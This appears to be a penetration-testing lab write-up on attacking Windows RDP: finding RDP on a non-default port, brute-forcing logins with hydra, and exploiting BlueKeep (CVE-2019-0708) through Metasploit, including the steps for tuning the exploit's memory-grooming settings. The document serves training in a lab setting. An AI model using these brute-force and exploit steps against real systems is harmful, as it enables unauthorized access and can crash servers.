🔬 RDP
Lab 1
🔬 Windows: Insecure RDP Service
Target IP:
10.4.18.131
RDP exploitation
Dictionaries to use:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
Enumeration
ping 10.4.18.131
nmap -sV 10.4.18.131
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp open ssl/dec-notes?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Use the Metasploit rdp_scanner module to check whether port 3333 is running RDP.
msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 10.4.18.131
set RPORT 3333
run

📌 RDP is exposed on target port 3333, not on the default port 3389.
RDP Brute-force
Try hydra to find a valid username and password. Hydra itself warns that RDP servers often reject many parallel connections, so if the run aborts or misses hits, lower the parallelism with -t 1 or -t 4; against domain accounts also keep the account lockout policy in mind before throwing a whole password list at one user.
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.18.131 -s 3333
[3333][rdp] host: 10.4.18.131 login: sysadmin password: samantha
[3333][rdp] host: 10.4.18.131 login: demo password: victoria
[3333][rdp] host: 10.4.18.131 login: auditor password: elizabeth
[3333][rdp] host: 10.4.18.131 login: administrator password: qwertyuiop

freerdp cannot be used in this lab; use xfreerdp to connect to the target via RDP:
xfreerdp /u:administrator /p:qwertyuiop /v:10.4.18.131:3333

Lab 2 - BlueKeep (Extra)
🔬 Home Lab
I have prepared a vulnerable Windows Server 2008 R2 virtual machine and connected it to the same network as the Kali virtual machine. On the server, I have activated the RDP service on the default port 3389.
Host system: Kali Linux
Target system: Windows Server 2008 R2
- IP 192.168.31.131
- Credentials: Administrator / Eternal17010
Exploitation tool: Metasploit Framework (msfconsole)
Vulnerability: CVE-2019-0708 - BlueKeep
❗ The exploit corrupts kernel-space memory; a miss crashes the whole system (BSOD), not just an application.
CVE-2019-0708 is a use-after-free in the RDP kernel driver (termdd.sys), reachable before authentication through the MS_T120 virtual channel, so an unauthenticated attacker can remotely execute arbitrary code in kernel context.
BlueKeep PoCs (proofs of concept) and exploits circulating online may themselves be malicious; use only verified exploit code and modules.

Target RDP activated:

Enumeration
nmap -sV -sC 192.168.31.131

📌 RDP port 3389 is open.
Exploitation
msfconsole
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep   # index 0 in the search output; the full path is stable across Metasploit versions
set RHOSTS 192.168.31.131
run

search bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce   # index 1 in the search output
set RHOSTS 192.168.31.131
show targets
set target 5   # 2008 R2 (6.1.7601 x64 - VMWare 15.1)
exploit



❗ This exploit can crash the target kernel (BSOD); never run it against a production environment ❗
Adjusting the exploit
To make the exploit work, I've used the Pentest-Tools blog on BlueKeep and Alexandre Vieira's blog post.
On the Windows Server 2008 target, open regedit and go to
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
Set the fDisableCam registry value to 0.

Finding the NPP
To make the exploit work, it needs the correct GROOMBASE value, which is the start address of the Non Paged Pool area (NPP). The module hardcodes one GROOMBASE per target, so the value must match the actual NPP base of your VM.
The NPP address can be extracted from a memory dump of the target machine.
In VMware, take a snapshot of the target virtual machine (Windows Server 2008 R2).
Download the vmss2core tool.
From the VM (virtual machine) folder, copy the .vmem and .vmsn files to the vmss2core tool folder.
Run the tool to generate a memory.dmp file:
.\vmss2core-sb-8456865.exe -W "WinSrv_2008_R2_x64-Snapshot1.vmsn" "WinSrv_2008_R2_x64-Snapshot1.vmem"
Run WinDbg and open the memory.dmp file.
Run !poolfind a to get a message reporting the NonPaged pool range being searched. The first address of that range is the start of the Non Paged Pool, in this case
fffffa8018c08000

Edit the exploit and set the GROOMBASE variable if it is not already set. In my case it is already set to the address above for target number 5, 2008 R2 (6.1.7601 x64 - VMWare 15.1).

Save the exploit file and run reload_all in the Metasploit console. Set GROOMSIZE to 50.
msfconsole
search bluekeep
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce   # index 1 in the search output
set RHOSTS 192.168.31.131
show targets
set target 5   # 2008 R2 (6.1.7601 x64 - VMWare 15.1)
set GROOMSIZE 50
exploit

Lab 3 (Extra)
Windows RDP: Dictionary Attack
Target IP:
10.4.22.41
RDP exploitation
Dictionaries to use:
/usr/share/metasploit-framework/data/wordlists/common_users.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
nmap 10.4.22.41
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.22.41 -s 3389

xfreerdp /u:administrator /p:bubbles /v:10.4.22.41
# default port is 3389